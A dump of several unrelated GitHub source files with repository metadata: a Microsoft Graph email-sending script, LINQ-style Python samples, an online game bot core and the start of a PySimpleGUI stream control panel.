criteria = criteria,\n                )\n            else:\n                yield cls(path, displayable_root, is_last)\n            count += 1\n\n    @classmethod\n    def _default_criteria(cls, path):\n        return True\n\n    def displayable(self):\n        if self.parent is None:\n            return self.displayname\n\n        _filename_prefix = (\n            self.display_filename_prefix_last\n            if self.is_last\n            else self.display_filename_prefix_middle\n        )\n\n        parts = ['{!s} {!s}'.format(_filename_prefix, self.displayname)]\n\n        parent = self.parent\n        while parent and parent.parent is not None:\n            parts.append(\n                self.display_parent_prefix_middle\n                if parent.is_last\n                else self.display_parent_prefix_last\n            )\n            parent = parent.parent\n\n        return ''.join(reversed(parts))\n\n\ndef add_neutral(x, alpha = 1e-2):\n    x = x.copy()\n    divide = 1 / x.shape[1]\n    x_minus = np.maximum(x - divide, alpha * x)\n    x_divide = x_minus / divide\n    sum_axis = x_divide.sum(axis = 1, keepdims = True)\n    return np.concatenate([x_divide, 1 - sum_axis], axis = 1)\n\n\ndef describe_availability(dict, transpose = True, text = ''):\n    if len(text):\n        import logging\n\n        logging.basicConfig(level = logging.INFO)\n\n        logging.info(text)\n    try:\n        import pandas as pd\n\n        df = pd.DataFrame(dict)\n\n        if transpose:\n            return df.T\n        else:\n            return df\n    except Exception:\n        return dict\n\n\nfrom . import validator\n","repo_name":"MuzyAce/malaya","sub_path":"malaya/function/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":13766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"}
+{"seq_id":"31970635305","text":"import requests\nimport json\nfrom os import system\nfrom apiCalls.apiChooseUser import pickUser\nfrom apiCalls.apiChooseUser import openTokenLibrary\n\n\n#------------Here is where you create a template email--------------------------\ndef templateEmail():\n\n    recipient = input('To: ')\n    \n    data={\n        \"message\": {\n\n            #Enter subject (str)\n            #\"subject\": '[subject]',\n            \"subject\": 'Test Template Email',\n            \"body\": {\n                \"contentType\": \"Text\",\n\n                #Enter Body (str)\n                #\"content\": '[body]'\n                \"content\": 'Test of the template email.'\n            },\n            \"toRecipients\": [\n                {\n                    \"emailAddress\": {\n                        #Enter Recipient (str)\n                        #\"address\": '[recipient]'\n                        \"address\": recipient\n                    }\n                }\n            ],\n            \n        },\n        \"saveToSentItems\": \"false\"\n    }\n    \n    return data\n\n#---------------------------------Create New Email-----------------------------------------------\ndef createEmail():\n\n    data=''\n    #email components\n    while True:\n        system('clear')\n        recipient = input('To Address: ')\n        if recipient == 'q':\n            break\n\n        subject = input('Subject: ')\n        if subject == 'q':\n            break\n\n        body = input('Body: ')\n        if body == 'q':\n            break\n\n        system('clear')\n\n        print('Confirmation:\\n')\n        print(f'To: {recipient}')\n        print(f'Subject: {subject}')\n        print(f'Body: {body}')\n\n        response = input('\\nIs everything correct? y/n/q: ')\n\n        if response == 'y':\n\n            data={\n                \"message\": {\n                    \"subject\": subject,\n                    \"body\": {\n                        \"contentType\": \"Text\",\n                        \"content\": body\n                    },\n                    \"toRecipients\": [\n                        {\n                            \"emailAddress\": {\n                                \"address\": recipient\n                            }\n                        }\n                    ],\n                    \n                },\n                \"saveToSentItems\": \"false\"\n            }\n            \n            break\n        \n        \n\n        elif response == 'n':\n            system('clear')\n            continue\n\n        elif response == 'q':\n            system('clear')\n            break\n    \n    return data\n#-----------------Main------------------------------------\ndef sendQuery(user):\n    data = ''\n    system('clear')\n\n    while True:\n        isCustom = input('New or template email? 
n/t: ')\n        \n        if isCustom == 'n':\n            data = createEmail()\n            break\n\n        elif isCustom == 'q':\n            return\n        \n        elif isCustom == 't':\n            data = templateEmail()\n            while True:\n                \n                sendTemplateEmail = input('Confirm send? y/n: ')\n\n                if sendTemplateEmail == 'y':\n                    break\n                if sendTemplateEmail == 'n':\n                    data = None\n                    return data\n                else:\n                    print('[-] Invalid input\\n')\n                    continue\n            break\n\n        else:\n            print('[-] Invalid input')\n            continue\n        \n    if not data:\n        return\n    \n    else:\n\n        #get user and token\n        tokenLibrary = openTokenLibrary()\n\n        #make and send query\n        headers={'Authorization': 'Bearer ' + tokenLibrary[user]['access_token'], 'Content-type': 'application/json'}\n\n        #send API request to send email\n        graph_data = requests.post('https://graph.microsoft.com/v1.0/me/sendMail', json=data, headers=headers)\n\n        if graph_data.status_code == 202:\n            print('[+] Email Sent Successfully\\n')\n        \n        else:\n            print(graph_data.text)\n        \n        input('Press ENTER to continue...')","repo_name":"Synzack/PynAuth","sub_path":"apiCalls/apiSendMail.py","file_name":"apiSendMail.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"}
+{"seq_id":"3946823360","text":"import shared\n\n\ndef linq54():\n    doubles = [1.7, 2.3, 1.9, 4.1, 2.9]\n    \n    sorted_doubles = sorted(doubles, reverse=True)\n\n    doubles_array = list(sorted_doubles)\n    \n    print(\"Every other double from highest to lowest:\")\n    d = 0\n    while d < len(doubles_array):\n        print(doubles_array[d])\n        d += 2\n\n\ndef linq55():\n    words = [\"cherry\", \"apple\", \"blueberry\"]\n\n    sorted_words = sorted(words)\n\n    word_list = list(sorted_words)\n\n    print(\"The sorted word list:\")\n    shared.printN(word_list)\n\n\ndef linq56():\n    score_records = [{'Name': \"Alice\", 'Score': 50},\n                     {'Name': \"Bob\", 'Score': 40},\n                     {'Name': \"Cathy\", 'Score': 45}]\n\n    score_records_dict = {s['Name']:s['Score'] for s in score_records}\n\n    print(\"Bob's score: %s\" % score_records_dict[\"Bob\"])\n\n\ndef linq57():\n    numbers = [None, 1.0, \"two\", 3, \"four\", 5, \"six\", 7.0]\n\n    floats = (n for n in numbers if isinstance(n, float))\n\n    print(\"Numbers stored as floats:\")\n    shared.printN(floats)\n\n\nlinq54()\n# linq55()\n# linq56()\n# linq57()\n","repo_name":"rogerwcpt/python-linq-samples","sub_path":"src/python/linq-conversion.py","file_name":"linq-conversion.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"6"}
+{"seq_id":"44676269386","text":"from __future__ import annotations\nfrom typing import (\n    List,\n    Optional,\n    Tuple,\n    Type,\n    TypeVar,\n)\n\nimport logging\nimport time\nimport traceback\n\nimport dbot.network.events as events\nfrom dbot.network.retrosocket import RetroSocket\n\nfrom dbot.state.party import Party\nfrom dbot.state.state import GameState\nfrom dbot.state.uistate import UIState\n\nfrom dbot.chat_commands import CommandHandler\n\nfrom dbot.battle.battle import Battle\nfrom dbot.battle.battle_controller import (\n    BattleController,\n    SimpleClericController,\n)\n\nfrom dbot.actions.action import Action\nfrom dbot.actions.map_action import MapAction\nfrom dbot.actions.party_action import PartyAction\nfrom dbot.actions.grind_action import (\n    GrindAction,\n    GrindTarget,\n)\n\nfrom dbot.config import BotConfig\nfrom dbot.common.type_help import *\nfrom dbot.movement.pathfinding import Point\nfrom dbot.movement.movement import MovementController\nfrom 
dbot.common.common import (\n    Direction,\n    Player,\n    UIPositions,\n)\n\n\nclass BotCore:\n    \"\"\" The bare essentials of a bot\n\n    All of the necessary game state, socket setup, event loop, etc.\n    are created, but it has no real in-game functionality.\n    \"\"\"\n\n    def __init__(\n        self,\n        config: BotConfig,\n    ) -> None:\n        self.config = config\n        self.name = config.name\n        self.admins = config.admins\n        self.friends = config.friends\n\n        # network\n        self._socket: Optional[RetroSocket] = None\n        self.logging_out = False\n\n        # gamestate\n        self.battle: Optional[Battle] = None\n        self.party = Party(self, [self.name])\n        self.state = GameState()\n        self.ui = UIState()\n\n        # controllers\n        self.battler: BattleController = SimpleClericController(self)\n        self.mover = MovementController(self)\n\n    #\n    # network properties\n    #\n\n    @property\n    def socket(self) -> RetroSocket:\n        if self._socket is not None:\n            return self._socket\n        raise RuntimeError('not connected')\n\n    #\n    # convenience properties\n    #\n\n    @property\n    def me(self) -> Player:\n        p = self.state.get_player(self.name)\n        assert p is not None\n        return p\n\n    @property\n    def position(self) -> Point:\n        return (\n            int(self.me['coords']['x']),\n            int(self.me['coords']['y']),\n        )\n\n    @property\n    def logged_in_friends(self) -> List[str]:\n        logged_in: List[str] = []\n        for friend in self.friends:\n            assert friend != self.name\n            if friend in self.state.players:\n                logged_in.append(friend)\n        return list(sorted(logged_in))\n\n    @property\n    def logged_in_bots(self) -> List[str]:\n        return list(sorted(\n            [self.name] + self.logged_in_friends\n        ))\n\n    @property\n    def is_bot_leader(self) -> bool:\n        return self.logged_in_bots[0] == self.name\n\n    @property\n    def is_in_battle(self) -> bool:\n        return self.battle is not None\n\n    #\n    # main loop\n    #\n\n    def run_forever(self) -> None:\n\n        n_errors = 0\n        last_action = 0.0\n        loop_timeout = 0.2\n        action_timeout = 0.5\n\n        with RetroSocket() as s:\n            self._socket = s\n            try:\n                while not self.logging_out:\n                    now = time.time()\n                    do_action = (now - last_action) > action_timeout\n                    self.do_step(do_action)\n                    if do_action:\n                        last_action = now\n                    time.sleep(loop_timeout)\n            except KeyboardInterrupt:\n                s.send_logout()\n                time.sleep(1)\n                return\n            except Exception as e:\n                n_errors += 1\n                if n_errors > self.config.max_errors:\n                    logging.error('hit max errors')\n                    raise e\n                else:\n                    self.warn_exception(e)\n            finally:\n                self._socket = None\n\n    def do_step(\n        self,\n        do_actions: bool,\n    ) -> None:\n        while not self.socket.event_queue.empty():\n            # handle all new events\n            event = self.socket.event_queue.get()\n            self.handle_event(event)\n\n        if do_actions:\n            # then do any actions\n            if self.is_in_battle:\n                self.battler.step()\n            else:\n                self.mover.step()\n            self.step()\n\n    def step(self) -> None:\n        # To be implemented by bots\n        ...\n\n    def handle_event(\n        self,\n        event: events.GameEvent,\n    ) -> None:\n        handler_name = f'on_{event.event_name}'\n        self.dispatch_handlers(handler_name, event)\n\n    def dispatch_handlers(\n        self,\n        handler_name: str,\n        *args,\n    ) -> None:\n        # always call ui handlers\n        self.call_handler(self.ui, handler_name, *args)\n\n        # call either battle or movement events\n        if self.is_in_battle:\n            self.call_handler(self.battler, handler_name, *args)\n        else:\n            self.call_handler(self.mover, handler_name, *args)\n\n        # finally check bot handlers\n        self.call_handler(self, handler_name, *args)\n\n    def call_handler(\n        self,\n        obj: object,\n        handler_name,\n        *args,\n    ) -> None:\n        handler = getattr(obj, handler_name, None)\n        backup = getattr(obj, 
'catch_all_handler', None)\n        if handler is not None:\n            handler(*args)\n        elif backup is not None:\n            backup(*args)\n\n    #\n    # logging\n    #\n\n    def warn_exception(\n        self,\n        e: Exception,\n    ) -> None:\n        logging.warning('\\n'.join([\n            '--- exception in dbot ---',\n            traceback.format_exc(),\n            '-------------------------',\n        ]))\n\n\nclass BasicBot(BotCore):\n    \"\"\" A simple bot that can respond to commands\n\n    GameEvent handlers to keep game state in sync along with\n    basic chat command functionality and an action queue.\n    \"\"\"\n\n    def __init__(\n        self,\n        *args,\n        **kwargs,\n    ) -> None:\n        super().__init__(*args, **kwargs)\n\n        # actions\n        self.commands = CommandHandler(self, self.config.command_prompt)\n        self.commands.add_default_commands()\n        self.action_queue: List[Action] = []\n\n        # TODO: put this somewhere?\n        self.report_channel = 'wsay'\n        self.report_state = 'none'\n        self.stopped_at_leave_map = False\n\n    def step(self) -> None:\n        if self.current_action is not None:\n            complete = self.current_action.step()\n            if complete:\n                self.current_action.cleanup()\n                self.action_queue.pop(0)\n\n    #\n    # commands and actions\n    #\n\n    @property\n    def current_action(self) -> Optional[Action]:\n        if len(self.action_queue) > 0:\n            return self.action_queue[0]\n        return None\n\n    def enqueue_action(\n        self,\n        action: Action,\n    ) -> None:\n        self.action_queue.append(action)\n\n    def clear_actions(self) -> None:\n        if self.current_action is not None:\n            self.current_action.cleanup()\n        self.action_queue = []\n\n    #\n    # game state update handlers\n    #\n\n    def on_update(\n        self,\n        e: events.Update,\n    ) -> None:\n        \"\"\" core client state updates, passed on to onchange_* methods \"\"\"\n        self.state.vars[e.key] = e.value\n        handler_name = f'onupdate_{e.key}'\n        self.dispatch_handlers(handler_name, e.value)\n\n    def on_playerUpdate(\n        self,\n        e: events.PlayerUpdate,\n    ) -> None:\n        player = self.state.get_player(e.username)\n        if player is not None:\n            player[e.key] = e.value\n            if e.username != self.name:\n                self.state.players_in_map.add(e.username)\n        else:\n            logging.warning(f'missing player moved: {e.username}')\n\n    #\n    # login flow\n    #\n\n    def on_connected(\n        self,\n        e: events.Connected,\n    ) -> None:\n        logging.info('connected, signing in')\n        self.socket.emit('signIn', {\n            'email': self.config.email,\n            'password': self.config.password,\n        })\n\n    def on_signedIn(\n        self,\n        e: events.SignedIn,\n    ) -> None:\n        self.socket.send_keypress('enter')\n\n    def on_startCharacterSelect(\n        self,\n        e: events.StartCharacterSelect,\n    ) -> None:\n        options = self.state.vars.get('selectableCharacters', [])\n        if len(options) == 0:\n            raise NotImplementedError('character creation')\n\n        index = self.pick_character([\n            (str(o['class']), int(o['level']))\n            for o in options\n        ])\n        assert index < len(options)\n        # TODO: other char's ui positions\n        self.socket.send_click(*UIPositions.CHARACTER_ONE)\n\n    def on_playerSignedIn(\n        self,\n        e: events.PlayerSignedIn,\n    ) -> None:\n        self.state.add_player(e.player)\n\n    def on_playerPreviouslySignedIn(\n        self,\n        e: events.PlayerPreviouslySignedIn,\n    ) -> None:\n        for player in e.players:\n            self.state.add_player(player)\n\n    def on_joinMap(\n        self,\n        e: events.JoinMap,\n    ) -> None:\n        self.state.join_map(e.map_name)\n        if self.stopped_at_leave_map and self.current_action is None:\n            self.say(f'stopped at {e.map_name}', 'wsay')\n            self.stopped_at_leave_map = False\n\n    def on_leaveMap(\n        self,\n        e: events.LeaveMap,\n    ) -> None:\n        if self.mover.clear_goto():\n            self.stopped_at_leave_map = True\n        self.state.left_map()\n\n    def on_playerLeftMap(\n        
self,\n        e: events.PlayerLeftMap,\n    ) -> None:\n        self.state.left_map(e.username)\n\n    #\n    # movement\n    #\n\n    def on_movePlayer(\n        self,\n        e: events.MovePlayer,\n    ) -> None:\n        # note: This method only updates player position in game state;\n        # any logic about how this affects this bot's movement is\n        # in movement.MovementController.on_movePlayer\n        player = self.state.get_player(e.username)\n        if player is None:\n            logging.warning(f'missing player moved: {e.username}')\n            return\n\n        if e.direction == Direction.down:\n            player['coords']['y'] += 1\n        if e.direction == Direction.up:\n            player['coords']['y'] -= 1\n        if e.direction == Direction.left:\n            player['coords']['x'] -= 1\n        if e.direction == Direction.right:\n            player['coords']['x'] += 1\n\n        # TODO: make this not bad\n        action = self.current_action\n        if action is not None and isinstance(action, MapAction):\n            action.on_movePlayer(e)\n\n    def on_bonk(\n        self,\n        e: events.Bonk,\n    ) -> None:\n        self.mover.on_bonk(e)\n\n    #\n    # battle\n    #\n\n    def on_startBattle(\n        self,\n        e: events.StartBattle,\n    ) -> None:\n        self.battle = Battle()\n        self.battler.start()\n\n    def on_leaveBattle(\n        self,\n        e: events.LeaveBattle,\n    ) -> None:\n        self.battler.leave()\n        self.battle = None\n\n    #\n    # chat\n    #\n\n    def on_message(\n        self,\n        e: events.Message,\n    ) -> None:\n        try:\n            self.commands.handle(e)\n        except Exception as exc:\n            logging.warning(f'exception parsing command: {exc}')\n            traceback.print_exc()\n\n    #\n    # party\n    #\n\n    def on_party(\n        self,\n        e: events.Party,\n    ) -> None:\n        # TODO: do verification based on party id?\n        if self.name in e.party:\n            self.party.update_party(e.party)\n\n    #\n    # var updates\n    #\n\n    def onupdate_statsPrompted(\n        self,\n        prompted: bool,\n    ) -> None:\n        if prompted and self.report_state == 'waiting on stats':\n            self.report_state = 'waiting on gold'\n            self.socket.send_click(*UIPositions.INVENTORY_BUTTON)\n\n    def onupdate_inventoryPrompted(\n        self,\n        prompted: bool,\n    ) -> None:\n        if prompted and self.report_state == 'waiting on gold':\n            self.report_state = 'none'\n            self.socket.send_click(*UIPositions.INVENTORY_BUTTON)\n            self.report()\n\n    #\n    # convenience methods\n    # and command implementations\n    #\n\n    def say(\n        self,\n        message: str,\n        channel = 'say',\n    ) -> None:\n        self.socket.send_message(channel, message)\n\n    def goto(\n        self,\n        path: List[Point],\n    ) -> None:\n        logging.debug(f'new route: {path}')\n        self.mover.goto(list(path))\n\n    def logout(self) -> None:\n        self.clear_actions()\n        self.socket.send_logout()\n        self.logging_out = True\n\n    def report(\n        self,\n        prompt = '',\n    ) -> None:\n        gold = sum([\n            int(self.state.vars.get('gold', 0)),\n            int(self.state.vars.get('bankedGold', 0)),\n        ])\n        level = str(self.me.get('level', 0))\n        self.say(f\"I'm {prompt}level {level}, {gold} gold\", self.report_channel)\n        self.report_state = 'none'\n\n    def check_stats_and_report(\n        self,\n        channel = 'wsay',\n    ) -> None:\n        self.report_channel = channel\n        if self.is_in_battle:\n            self.report('in battle, ')\n        elif self.report_state == 'none':\n            self.report_state = 'waiting on stats'\n            self.socket.send_click(*UIPositions.STATS_BUTTON)\n\n    def join_party(\n        self,\n        party: List[str],\n    ) -> None:\n        self.party.set_target(party)\n        self.enqueue_action(PartyAction(self))\n\n    def grind(\n        self,\n        target: GrindTarget,\n    ) -> None:\n        self.enqueue_action(GrindAction(self, target))\n\n    def start_mapping(\n        self,\n        focus: Optional[str] = None,\n    ) -> None:\n        self.enqueue_action(MapAction(self, focus_map=focus))\n\n    def stop(self) -> None:\n        self.mover.clear_goto()\n        
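# halt any in-progress route first, then drop whatever actions are still queued\n        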
self.clear_actions()\n\n    #\n    # ui interface\n    #\n\n    def click_at_tile(\n        self,\n        x: int,\n        y: int,\n    ) -> None:\n        me = self.state.players[self.name]\n        screen_x = 150 - (me['coords']['x'] - x) * 16\n        screen_y = 120 - (me['coords']['y'] - y) * 16\n        self.socket.send_click(screen_x, screen_y)\n\n    #\n    # for override\n    #\n\n    def pick_character(\n        self,\n        characters: List[Tuple[str, int]],\n    ) -> int:\n        return 0\n\n\nif __name__ == '__main__':\n    import argparse\n\n    parser = argparse.ArgumentParser()\n    parser.add_argument('botname')\n    parser.add_argument('--config', type=str, default='config.json')\n    parser.add_argument('--nerror', type=int, default=0)\n    args = parser.parse_args()\n\n    logging.getLogger().setLevel(logging.DEBUG)\n\n    config = BotConfig.from_file(args.config, args.botname)\n    bot = BasicBot(config)\n    bot.run_forever()\n","repo_name":"snwhd/dbot","sub_path":"dbot/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":14902,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"}
+{"seq_id":"29018909138","text":"'''\nThis is the main file for the user interface.\n'''\nimport os\nimport subprocess\nimport sys\nimport threading\nfrom json import JSONDecodeError\n\nimport PySimpleGUI as sg\nimport psutil\nimport pydirectinput\nfrom jsonschema import ValidationError\nfrom pyuac import main_requires_admin\n\nfrom streamchatwars._shared.constants import RANDOM_ACTIONS_FILE, ACCEPT_INPUT_FILE, DEFAULT_CREDENTIAL_FILE\nfrom streamchatwars._shared.global_data import GlobalData\nfrom streamchatwars._shared.types import CredentialDict, TwitchChatCredentialDict, ConfigDict\nfrom streamchatwars.config import json_utils\nfrom streamchatwars.config.config import read_json_configs, IRC_Settings, extract_irc_settings\nfrom streamchatwars.config.json_utils import InvalidCredentialsError\nfrom streamchatwars.events.events_states import GlobalEventStates\nfrom userinterface import games, obsplugin\n\nallowed_file_types = ((\"Image Files\", \"*.png\"), (\"Image Files\", \"*.jpg\"), (\"Image Files\", \"*.jpeg\"),\n                      (\"Image Files\", \"*.webp\"), (\"Image Files\", \"*.gif\"))\n\n\n@main_requires_admin\ndef main():\n    check_directories()\n    GUI()\n\n\ndef check_directories():\n    if not os.path.exists('userinterface/images'):\n        os.makedirs('userinterface/images')\n    if not os.path.exists('userinterface/pokemon'):\n        os.makedirs('userinterface/pokemon')\n\n\ndef main_layout():\n    return [\n        [sg.Text('Stream Extensions Control', justification='center', font=(\"Helvetica\", 30), size=(800, 1))],\n        [sg.HSeparator()],\n        # Selector for Chat Picks and Stream Chat Wars\n        [sg.Column(layout=[\n            [sg.Frame(title='Select which Control Panel to run', title_color='orange', relief=sg.RELIEF_SUNKEN,\n                      element_justification='center', key='select_control_panel', vertical_alignment='center',\n                      layout=[\n                          [sg.Button('Chat Picks', font=\"Helvetica\", key='chat_picks',\n                                     button_color=('white', 'gold'),\n                                     border_width=3),\n                           sg.Button('Chat Plays', font=\"Helvetica\", key='stream_chat_wars',\n                                     button_color=('white', 'gold'),\n                                     border_width=3)],\n                          [sg.Button('Reset credentials', font=\"Helvetica\", key='reset_credentials',\n                                     button_color=('white', 'red'), border_width=3)],\n                      ])],\n            [sg.Button('Exit', font=\"Helvetica\", key='Exit', button_color=('white', 'red'),\n                       border_width=3)]\n        ], justification='center', element_justification='center', vertical_alignment='center')],\n\n    ]\n\n\ndef chat_picks_layout():\n    return [\n        [sg.Text('Chat Picks Control Panel', 
justification='center', font=(\"Helvetica\", 30), size=(800, 1),\n                 relief=sg.RELIEF_RIDGE, key='title', text_color='white', background_color='blue', border_width=3)],\n        [sg.HSeparator()],\n        # Chat Picks Control Panel Frame\n        [sg.Column(layout=[\n            [sg.Frame(title=\"Main Controls\", layout=[\n                [sg.Button('Start OBS Connection', font=\"Helvetica\", key='start_webserver',\n                           button_color=('white', 'green'), ),\n                 sg.Button('Stop OBS Connection', font=\"Helvetica\", key='stop_webserver',\n                           button_color=('white', 'red'), )],\n                # [sg.Button('TestButton', font=\"Helvetica\", key='test_button', button_color=('white', 'green'), )],\n            ], element_justification='center', title_location='n')],\n            [sg.Column(layout=[\n                [sg.Column(layout=[\n                    [sg.Frame(title='OBS Setup', layout=setup_obs_inner_layout(),\n                              element_justification='center', title_location='n')]], key='obs_setup', visible=False),\n                 sg.Column(layout=[\n                     [sg.Frame(title='Controls', layout=controls_layout(), element_justification='center',\n                               title_location='n')]], key='controls',\n                     visible=False)],\n            ])],\n            [sg.Text(\n                'Do not adjust the sources created by the program. They are used for the program to work and will not function properly without them.'\n                '\\nYou can change the position of the sources in OBS but don\\'t change the name or properties of the sources.',\n                text_color='red', font=(\"Helvetica\", 8), justification='center')],\n            [sg.HSeparator()],\n            [sg.Button('Main Menu', font=\"Helvetica\", key='Main_Menu', button_color=('white', 'red'),\n                       border_width=3), ]\n        ], justification='center', element_justification='center', vertical_alignment='center')],\n    ]\n\n\ndef setup_obs_inner_layout():\n    return [\n        [sg.Text('Select OBS Scene: ', font=(\"Helvetica\", 15)),\n         sg.Combo(default_value='none', key='selected_scene',\n                  font=(\"Helvetica\", 12), size=(18, 1), values=[])],\n        [sg.Text('Twitch Username:', font=(\"Helvetica\", 15)),\n         sg.Input(key='streamer_name', font=(\"Helvetica\", 12), size=(18, 1), )],\n        [sg.Button('Setup OBS', font=\"Helvetica\", key='setup_obs', button_color=('white', 'green'), )],\n    ]\n\n\ndef controls_layout():\n    return [\n        [sg.Text('Scene with Setup: ', font=(\"Helvetica\", 15), key='scene_with_setup'),\n         sg.Text('None', key='scene_setup', font=(\"Helvetica\", 15), text_color='red'),\n         sg.Button('Go to Scene', font=\"Helvetica\", key='go_to_scene', button_color=('white', 'green'), )],\n        [sg.Text('Current Scene:', font=(\"Helvetica\", 15), key='current_scene'),\n         sg.Text('None', key='scene_text', font=(\"Helvetica\", 15), text_color='red'), ],\n        [sg.Frame(title='Image Controls', layout=[\n            [sg.Button('Show Image', font=\"Helvetica\", key='set_visible', button_color=('white', 'green'), ),\n             sg.Button('Hide Image', font=\"Helvetica\", key='set_invisible', button_color=('white', 'red'), )],\n            [sg.Text('Enter image URL: '),\n             sg.InputText(key='-FILEIN-', size=(20, 1)), ],\n            [sg.Button('Upload', key='upload_image'),\n             sg.Button('Clear Image', key='clear_image', button_color=('white', 'red'), )],\n        ], element_justification='center', title_location='n')],\n        [sg.Frame(title='Poll Controls', layout=[\n            [sg.Text('Poll Status: ', font=(\"Helvetica\", 15), key='poll_status'),\n             sg.Text('', key='poll_status_text', )],\n            [sg.Button('Enable Poll', font=\"Helvetica\", key='enable_poll', button_color=('white', 'green'), ),\n             sg.Button('Disable Poll', font=\"Helvetica\", key='disable_poll', button_color=('white', 'red'), )],\n            [sg.Button('Show Poll', font=\"Helvetica\", key='show_poll', button_color=('white', 'green'), ),\n             sg.Button('Hide 
Poll', font=\"Helvetica\", key='hide_poll', button_color=('white', 'red'), )],\n [sg.Button('Reset Poll', font=\"Helvetica\", key='reset_poll', button_color=('white', 'red'), ), ]\n ], element_justification='center', title_location='n')],\n [sg.Button('Remove OBS Sources', font=\"Helvetica\", key='remove_sources', button_color=('white', 'red'), )],\n ]\n\n\ndef stream_chat_wars_layout():\n return [\n [sg.Text('Chat Plays Control Panel', justification='center', font=(\"Helvetica\", 30), size=(800, 1),\n relief=sg.RELIEF_RIDGE, key='title', text_color='white', background_color='blue', border_width=3)],\n [sg.HSeparator()],\n # Input Server Controls Frame\n [sg.Column(layout=[\n [sg.Frame(title=\"Main Controls\", layout=[\n [sg.Column(layout=[\n [sg.Frame(title='Input Server Controls', title_color='Orange', relief=sg.RELIEF_SUNKEN,\n title_location='n', key='input_server_controls',\n layout=[\n [sg.Text('Controls for the Input Server')],\n [sg.Button('Start Input Server', font=\"Helvetica\", key='start_input_server',\n button_color=('white', 'green'),\n border_width=3)],\n [sg.Button('Stop Input Server', font=\"Helvetica\", key='stop_input_server',\n button_color=('white', 'red'),\n border_width=3)]\n ], element_justification='center')],\n ], justification='center'),\n\n # Chat Wars Controls Frame\n sg.Frame(title='Chat Plays Controls', title_color='orange', relief=sg.RELIEF_SUNKEN,\n title_location='n', key='stream_chat_wars_controls', layout=[\n [sg.Text('Select a game:', font=(\"Helvetica\", 15)),\n sg.Combo(games.get_game_names(), default_value='none', key='selected_game',\n font=(\"Helvetica\", 12), size=(18, 1))],\n [sg.Button('Start Chat plays', font=\"Helvetica\", key='start_stream_chat_wars',\n button_color=('white', 'green'),\n border_width=3)],\n [sg.Button('Stop Chat Plays', font=\"Helvetica\", key='stop_stream_chat_wars',\n button_color=('white', 'red'),\n border_width=3)]\n ], element_justification='center')\n ],\n [sg.Frame(title='Input Switches', title_color='orange', relief=sg.RELIEF_SUNKEN, key='input_switches',\n layout=[\n [sg.Text('Accept Chat Input:', font=(\"Helvetica\", 15), key='chat_input_status'),\n sg.Button('On', font=\"Helvetica\", key='accept_chat_input_on',\n button_color=('white', 'green'), border_width=3),\n sg.Button('Off', font=\"Helvetica\", key='accept_chat_input_off',\n button_color=('white', 'red'), border_width=3)],\n [sg.Text('Random Inputs:', font=(\"Helvetica\", 15), key='random_inputs_status'),\n sg.Button('On', font=\"Helvetica\", key='random_inputs_on',\n button_color=('white', 'green'), border_width=3),\n sg.Button('Off', font=\"Helvetica\", key='random_inputs_off',\n button_color=('white', 'red'), border_width=3)],\n [sg.Text('Reset Teams:', font=(\"Helvetica\", 15), key='reset_teams_text'),\n sg.Button('Reset', font=\"Helvetica\", key='reset_teams', button_color=('white', 'red'),\n border_width=3)],\n ], title_location='n'),\n sg.Frame(title='Chat Wars Controls', title_color='orange', relief=sg.RELIEF_SUNKEN,\n key='chat_wars_controls',\n layout=[\n [sg.Text('Failsafe Hotkey:', font=(\"Helvetica\", 15), key='failsafe_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='failsafe_hotkey')],\n [sg.Text('Chat Input Hotkey:', font=(\"Helvetica\", 15), key='chat_input_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='chat_input_hotkey')],\n [sg.Text('Random Inputs Hotkey:', font=(\"Helvetica\", 15),\n key='random_inputs_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='random_inputs_hotkey')],\n [sg.Text('Reset 
Teams Hotkey:', font=(\"Helvetica\", 15), key='reset_teams_hotkey_text'),\n sg.Text('None', font=(\"Helvetica\", 15), key='reset_teams_hotkey')],\n ], title_location='n')\n ],\n [\n sg.Frame(title='Status Panel', title_color='orange', relief=sg.RELIEF_SUNKEN, key='status_panel',\n layout=[\n # Input Server Status\n [sg.Text('Input Server Status:', font=(\"Helvetica\", 15)),\n sg.Text('Off', key='input_status', text_color='red')],\n # Stream Chat Wars Status\n [sg.Text('Chat Plays Status:', font=(\"Helvetica\", 15)),\n sg.Text('Off', key='stream_chat_wars_status', text_color='red')],\n # Chat Input Status\n [sg.Text('Chat Input:', font=(\"Helvetica\", 15)),\n sg.Text('Off', key='chat_input', text_color='red')],\n # Random Inputs Status\n [sg.Text('Random Inputs:', font=(\"Helvetica\", 15)),\n sg.Text(('Off' if GlobalEventStates.state_random_action is False else 'On'),\n key='random_inputs', text_color='red')],\n ], title_location='n'),\n ],\n ], title_location='n', element_justification='center', vertical_alignment='center', key='main_controls',\n relief=sg.RELIEF_SUNKEN)],\n [sg.HSeparator()],\n [sg.Button('Main Menu', font=\"Helvetica\", key='Menu', button_color=('white', 'red'),\n border_width=3), ]\n ], justification='center', element_justification='center', vertical_alignment='center')]\n ]\n\n\ndef login_layout():\n return [\n\n [sg.Text('Twitch Login', justification='center', font=(\"Helvetica\", 30), size=(800, 1))],\n [sg.Text('WHATEVER YOU DO DONT EVER SHOW THIS ON STREAM!!', justification='center', font=(\"Helvetica\", 15),\n text_color='red', size=(800, 1))],\n [sg.HSeparator()],\n [sg.Column(layout=[\n [sg.Frame(title='Login', title_location='n', title_color='purple', relief=sg.RELIEF_SUNKEN,\n key='twitch_login', layout=[\n [sg.Text('Bot Username:', font=(\"Helvetica\", 15)),\n sg.InputText(key='bot_username', font=(\"Helvetica\", 15), size=(20, 1))],\n [sg.Text('Bot OAuth:', font=(\"Helvetica\", 15)),\n sg.InputText(key='bot_oauth', font=(\"Helvetica\", 15), size=(30, 1), password_char='*')],\n [sg.Text('Twitch API Client ID: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='twitch_api_client_id', font=(\"Helvetica\", 15), size=(30, 1))],\n [sg.Text('Twitch API Client Secret: ', font=(\"Helvetica\", 15)),\n sg.InputText(key='twitch_api_client_secret', 